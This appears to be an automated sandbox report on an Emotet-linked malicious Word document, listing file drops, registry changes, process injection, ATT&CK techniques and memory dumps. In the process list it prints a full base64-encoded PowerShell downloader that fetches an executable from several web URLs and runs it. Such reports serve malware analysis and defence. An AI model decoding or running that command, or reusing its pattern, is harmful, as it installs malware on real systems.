51de13d18a23740342f1c681de4cb6c2baf116f2a4df4730c5338439d05823e4

General

Target

Docs_34df7390e3fba4cc8b8de327c79c3741.html
Sample

191010-4rly58v2mj
SHA256

51de13d18a23740342f1c681de4cb6c2baf116f2a4df4730c5338439d05823e4

Score

N/A

Malware Config

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 5 IoCs

Processes:

WINWORD.EXE

at	description	ioc	process
2356	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
2387	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
2387	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
3339	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_34df7390e3fba4cc8b8de327c79c3741.html.doc	WINWORD.EXE
3713	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_34df7390e3fba4cc8b8de327c79c3741.html.doc	WINWORD.EXE

Drops file in system dir 6 IoCs

Processes:

WINWORD.EXEpowershell.exe320.exeloadarouter.exe

at	description	ioc	process
3947	File deleted	C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD	WINWORD.EXE
3947	File created	C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD	WINWORD.EXE
8331	File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
8409	File opened for modification	C:\Windows\system32\GDIPFONTCACHEV1.DAT	WINWORD.EXE
34289	File renamed	C:\Users\Admin\320.exe => C:\Windows\SysWOW64\loadarouter.exe	320.exe
54148	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	loadarouter.exe

Modifies registry class 1 TTPs 367 IoCs

persistence

Modify Registry

T1112

Processes:

WINWORD.EXE

at	description	ioc	process
6022	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}	WINWORD.EXE
6022	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0	WINWORD.EXE
6022	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
6022	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\FLAGS	WINWORD.EXE
6022	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\FLAGS\ = "6"	WINWORD.EXE
6022	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\0	WINWORD.EXE
6022	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\0\win32	WINWORD.EXE
6022	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"	WINWORD.EXE
6022	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\HELPDIR	WINWORD.EXE
6022	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\FLAGS	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\FLAGS\ = "6"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\0	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\0\win32	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\HELPDIR	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{9F249262-CFD2-4B31-BD68-0248DB5F57EE}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
6022	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
6022	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE

Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

at description process

14867 Token: SeDebugPrivilege powershell.exe
Suspicious behavior: EnumeratesProcesses

at	description	process
14867	Token: SeDebugPrivilege	powershell.exe

Uses Task Scheduler COM API 1 TTPs 12 IoCs

persistence

Query Registry

T1012

Processes:

OSPPSVC.EXE

at	description	ioc	process
18986	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	OSPPSVC.EXE
18986	Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	OSPPSVC.EXE
18986	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs	OSPPSVC.EXE
18986	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid	OSPPSVC.EXE
18986	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ProgID\	OSPPSVC.EXE
18986	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\	OSPPSVC.EXE
18986	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	OSPPSVC.EXE
18986	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\InprocServer32	OSPPSVC.EXE
18986	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\	OSPPSVC.EXE
18986	Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\ThreadingModel	OSPPSVC.EXE
18986	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32	OSPPSVC.EXE
18986	Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler	OSPPSVC.EXE

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

powershell.exe320.exeloadarouter.exe

at	description	process	target process
26474	PID 2004 wrote to memory of 1136	powershell.exe	320.exe
27035	PID 1136 wrote to memory of 1672	320.exe	320.exe
35335	PID 1480 wrote to memory of 972	loadarouter.exe	loadarouter.exe

Emotet Sync 1 IoCs
trojan banker

Processes:

320.exe

description ioc process

Event created Global\E64C019BB 320.exe
Suspicious behavior: EmotetMutantsSpam
emotet family
family

description	ioc	process
Event created	Global\E64C019BB	320.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_34df7390e3fba4cc8b8de327c79c3741.html.doc"
1⤵
- Drops Office document
- Drops file in system dir
- Modifies registry class
PID:1272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADcAOABjADIAOQA3ADcAYwB4ADMAMAA9ACcAeAA4ADIAMAAwADQANAA1ADQANwAxADEANwAnADsAJABjADkAOQAwAGMAOQAwADkAMgA1ADkANwAgAD0AIAAnADMAMgAwACcAOwAkAGMANgA1ADEAOQA5ADQANQA0ADAAMAA9ACcAYwA2ADIANQBjADkANwBjADAAMABjAGIAJwA7ACQAeAA3ADgAYwB4ADkANQAyAGIAOAA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADkAOQAwAGMAOQAwADkAMgA1ADkANwArACcALgBlAHgAZQAnADsAJAB4ADAAeABjADIAMAB4AGIAMAAzAHgAPQAnAHgAMAA1AHgANAAxADAAOQBiADAAOQAnADsAJABjADEAMwA0ADUANAB4ADgAYwB4AHgANAAzAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAEUAVAAuAHcARQBiAGMAbABpAEUATgB0ADsAJABiADAAMABjADYAYwAxADgANwA5ADkANgA9ACcAaAB0AHQAcAA6AC8ALwBlAHIAYQBrAG8AbgBsAGEAdwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFEAaQBtAGEAeQBKAHUATQBZAC8AQABoAHQAdABwADoALwAvAGMAYQByAGUAZQByAHAAbAB1AHMAcwBhAHQAbgBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBZAG4ASwBjAGMAbgBoAFoASwAvAEAAaAB0AHQAcAA6AC8ALwByAGEAbQBlAHMAaAB6AGEAdwBhAHIALgBjAG8AbQAvADMAbABqAGoANgAvAHcAUQBzAHQAdgBlAE0AQQBHAG0ALwBAAGgAdAB0AHAAOgAvAC8AcABsAGEAbgBlAHQAbABhAG4AYwBlAHIALgBjAG8AbQAvAGgAOAByAGcAZQAvAGsAaQBtADYANgBfAGEAZQBxAG4AYQA4ADAALQAyADAAOAA1AC8AQABoAHQAdABwADoALwAvAHAAcgBhAGQAbwBwAHIAbwAuAHIAdQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhAGIAcABpAFYARQBvAGYALwAnAC4AIgBzAFAAYABMAGkAdAAiACgAJwBAACcAKQA7ACQAeAAwAGMAOQAzAGIAMwA2ADQANgAzADcAPQAnAGIAOAA5ADAANABiADQAMwAyADMAMAA5ACcAOwBmAG8AcgBlAGEAYwBoACgAJAB4ADMAOQAwADcAMgAwAGIAYwBjADYAMwAwACAAaQBuACAAJABiADAAMABjADYAYwAxADgANwA5ADkANgApAHsAdAByAHkAewAkAGMAMQAzADQANQA0AHgAOABjAHgAeAA0ADMALgAiAEQAYABvAFcAbgBsAE8AYQBkAEYAYABJAGwARQAiACgAJAB4ADMAOQAwADcAMgAwAGIAYwBjADYAMwAwACwAIAAkAHgANwA4AGMAeAA5ADUAMgBiADgAOAApADsAJABiADAAMAAyADAAOAA4AGIAMABiAHgAMAA9ACcAYwAzAGIANAA5ADAANAB4ADQAeAAzADMAYwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAHgANwA4AGMAeAA5ADUAMgBiADgAOAApAC4AIgBsAGUAYABOAEcAdABIACIAIAAtAGcAZQAgADMANgAzADMAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJAB4ADcAOABjAHgAOQA1ADIAYgA4ADgAKQA7ACQAYwA3ADEAMAB4ADUANgB4ADAAeAA5ADQAOQA9ACcAYgAzADgANgAwADEAMwB4AHgAeAA1ADYAMAAnADsAYgByAGUAYQBrADsAJABiADAANQBjAGIANAA5ADAAOQAzADAAYgA9ACcAeAB4ADMAOQBiADAAMAA2ADIAOAA3ADcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwA3ADAANgBiADQANwAwADAANwA2AD0AJwBiADAAYwBjAGMAMAA0ADAAeABjADAAMAAxACcA
1⤵
- Drops file in system dir
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-18170784908697394311628740578387346531-677808680-42099562712138816031910190307"
1⤵
PID:252

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
1⤵
- Uses Task Scheduler COM API
PID:1960

C:\Users\Admin\320.exe
"C:\Users\Admin\320.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1136

C:\Users\Admin\320.exe
--c73fdd8f
1⤵
- Drops file in system dir
- Emotet Sync
PID:1672

C:\Windows\SysWOW64\loadarouter.exe
"C:\Windows\SysWOW64\loadarouter.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\SysWOW64\loadarouter.exe
--f7a216da
1⤵
- Drops file in system dir
PID:972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/972-7-0x0000000000400000-0x0000000000490000-memory.dmp

Filesize
576KB

Download
memory/1272-0-0x00000000061D0000-0x00000000063D0000-memory.dmp

Filesize
2.0MB

Download
memory/1272-1-0x00000000061D0000-0x00000000063D0000-memory.dmp

Filesize
2.0MB

Download
memory/1672-4-0x0000000000400000-0x0000000000490000-memory.dmp

Filesize
576KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads